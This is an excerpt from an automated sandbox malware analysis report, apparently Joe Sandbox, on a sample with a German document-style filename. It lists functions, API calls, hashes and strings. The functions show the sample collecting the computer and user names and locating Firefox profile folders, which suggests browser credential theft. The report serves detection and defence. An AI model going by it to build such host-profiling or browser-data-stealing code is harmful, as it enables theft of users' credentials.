                                                            • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                            • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                            • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                                            Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 156 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 157 407dc4 156->157 158 407df8-407dfb 156->158 159 407dca-407dd3 157->159 160 407e2c-407e30 158->160 161 407dfd-407e06 158->161 162 407dd5-407dd9 159->162 163 407dda-407df6 159->163 164 407e08-407e0c 161->164 165 407e0d-407e2a 161->165 162->163 163->158 163->159 164->165 165->160 165->161
                                                            APIs
                                                            • memset.MSVCRT ref: 00407CDB
                                                            • memset.MSVCRT ref: 00407CEF
                                                            • memset.MSVCRT ref: 00407D09
                                                            • memset.MSVCRT ref: 00407D1E
                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                            • strlen.MSVCRT ref: 00407D91
                                                            • strlen.MSVCRT ref: 00407DA0
                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                            • String ID: 5$H$O$b$i$}$}
                                                            • API String ID: 1832431107-3760989150
                                                            • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                            • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                            • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                            • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                                            Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040FC6B
                                                            • memset.MSVCRT ref: 0040FC82
                                                              • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                              • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                              • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                            • _mbscat.MSVCRT ref: 0040FCAD
                                                              • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                              • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                              • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                            • _mbscat.MSVCRT ref: 0040FCD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                            • API String ID: 748118687-1174173950
                                                            • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                            • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                            • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                            • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9